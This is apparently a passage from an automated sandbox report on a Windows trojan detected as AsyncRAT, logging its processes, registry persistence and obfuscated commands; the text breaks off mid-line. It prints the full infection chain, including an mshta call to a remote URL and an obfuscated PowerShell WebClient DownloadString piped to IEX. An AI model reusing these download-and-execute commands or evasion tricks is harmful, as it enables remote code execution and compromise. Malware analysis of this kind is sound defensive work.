          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Settings.csBase64 encoded string: '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'
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 23.0.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
          Source: 23.2.aspnet_compiler.exe.400000.0.unpack, Client/Helper/Methods.csSecurity API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: classification engineClassification label: mal92.troj.evad.winEXE@12/12@5/7
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xGrfj8RvYg.exe.logJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1564:120:WilError_01
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ligmpoba.nku.ps1Jump to behavior
          Source: xGrfj8RvYg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\xGrfj8RvYg.exe 'C:\Users\user\Desktop\xGrfj8RvYg.exe'
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txt
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' https://ia601502.us.archive.org/2/items/clean-lol-123_20210603/Clean_lol123.txtJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windo 1 -noexit -exec bypass -file C:\Users\Public\-----Run+++++++++.ps1Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: xGrfj8RvYg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: xGrfj8RvYg.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: xGrfj8RvYg.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\Users\Win 10 test Antiviru\Desktop\NORD VPN\NORD VPN\obj\Debug\NORD VPN.pdb source: xGrfj8RvYg.exe

          Data Obfuscation:

          barindex
          Obfuscated command line foundShow sources
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT ='https://ia601509.us.archive.org/21/items/all-lol-123_20210603/ALL_lol123.TXT';$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS='Down^^^^^^^^^^^^^string'.Replace('^^^^^^^^^^^^^','load');$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO = 'WebBANKnt'.Replace('BANK','Clie');$T4RDTHFTJGJKHL='WFt'.Replace('WF','NE');$EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE='(NewYEAe'.Replace('YEA','-Obj');$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF='ct System.$T4RDTHFTJGJKHL.$OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO).$SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS($TTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTTT)';I`E`X ($EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE,$FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF -Join '')|I`E`X Jump to behavior
          Source: xGrfj8RvYg.exeStatic PE information: 0xDE169215 [Tue Jan 27 05:52:21 2088 UTC]

          Boot Survival:

          barindex
          Yara detected AsyncRATShow sources
          Source: Yara matchFile source: 00000017.00000000.310047645.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.467029735.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.470750040.0000000002BE1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6396, type: MEMORY
          Source: Yara matchFile source: 23.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 23.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
          Source: C:\Windows\System32\mshta.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\xGrfj8RvYg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powersh